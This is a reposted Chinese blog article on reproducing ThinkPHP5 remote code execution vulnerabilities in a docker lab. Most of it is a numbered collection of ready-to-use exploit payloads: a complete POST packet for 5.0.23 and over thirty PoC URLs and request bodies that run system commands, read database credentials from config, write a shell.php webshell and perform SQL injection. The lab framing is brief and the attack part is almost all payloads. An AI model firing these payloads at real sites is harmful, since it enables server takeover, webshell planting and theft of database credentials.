碼上歡樂
相關內容    簡體    繁體

ThinkPHP5 遠程代碼執行漏洞復現

本文轉載自   查看原文   2021-05-09 19:36   1155 

ThinkPHP5 5.0.22/5.1.29 遠程代碼執行漏洞復現

ThinkPHP是一款運用極廣的PHP開發框架。其版本5中,由於沒有正確處理控制器名,導致在網站沒有開啟強制路由的情況下(即默認情況下)可以執行任意方法,從而導致遠程命令執行漏洞。

實驗環境

靶機:ThinkPHP5 5.0.20

攻擊機:kali

 

復現:

1.docker搭建好環境

 

 

 

 

2.直接訪問`http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1`,即可執行phpinfo:

簡單,快捷  ^ ^

 

 

 

 

 

3.寫入一句話木馬  #PHP7.1以上assert函數用不了!

 

 

 

 

 

 

 

ThinkPHP5 5.0.23 遠程代碼執行漏洞
ThinkPHP是一款運用極廣的PHP開發框架。其5.0.23以前的版本中,獲取method的方法中沒有正確處理方法名,導致攻擊者可以調用Request類任意方法並構造利用鏈,從而導致遠程代碼執行漏洞。

實驗環境

靶機:ThinkPHP5 5.0.23

攻擊機:kali

 

復現: 

發送構造好的數據包即可

```
POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
```

 

 

----------------------------------------------------------------------------------------------------------------------------------------------------------------

 

其他一些版本的

 

POC:

 

thinkphp 5.0.22

 

1、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username
2、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password
3、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
4、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

 

thinkphp 5

 

5、http://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

 

thinkphp 5.0.21

 

6、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
7、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

 

thinkphp 5.1.*

 

8、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1
9、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd
10、http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
11、http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
12、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
13、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
14、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
15、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd

 

未知版本

 

16、?s=index/\think\module/action/param1/${@phpinfo()}
17、?s=index/\think\Module/Action/Param/${@phpinfo()}
18、?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}
19、index.php?s=/home/article/view_recent/name/1'
header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"
20、index.php?s=/home/shopcart/getPricetotal/tag/1%27
21、index.php?s=/home/shopcart/getpriceNum/id/1%27
22、index.php?s=/home/user/cut/id/1%27
23、index.php?s=/home/service/index/id/1%27
24、index.php?s=/home/pay/chongzhi/orderid/1%27
25、index.php?s=/home/pay/index/orderid/1%27
26、index.php?s=/home/order/complete/id/1%27
27、index.php?s=/home/order/complete/id/1%27
28、index.php?s=/home/order/detail/id/1%27
29、index.php?s=/home/order/cancel/id/1%27
30、index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+
31、POST /index.php?s=/home/user/checkcode/ HTTP/1.1
Content-Disposition: form-data; name="couponid"
1') union select sleep('''+str(sleep_time)+''')#

 

thinkphp 5.0.23(完整版)debug模式

 

32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx

 

thinkphp 5.0.23(完整版)

 

33、(post)public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al

 

thinkphp 5.0.10(完整版)

 

34、(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system

 

thinkphp 5.1.* 和 5.2.* 和 5.0.*

 

35、(post)public/index.php (data)c=exec&f=calc.exe&_method=filter


來自WebShell'S Blog,本文地址:https://www.webshell.cc/7369.html

 

 

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 【RCE | BUUCTF】ThinkPHP 5.0.23 遠程代碼執行漏洞復現 ThinkPHP5 遠程命令執行漏洞分析 ThinkPHP 5.x遠程命令執行漏洞復現 漏洞復現-thinkphp5.0.23-遠程命令執行 記一次掛馬清除經歷:處理一個利用thinkphp5遠程代碼執行漏洞挖礦的木馬 ThinkPHP 2.x 任意代碼執行漏洞 復現與分析 ThinkPHP 2.x 任意代碼執行漏洞復現 ThinkPHP(5.0.23-rce)任意代碼執行漏洞復現及原理 漏洞復現-CVE-2016-4977-Spring遠程代碼執行 漏洞復現-CVE-2017-7525-Jackson遠程代碼執行
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM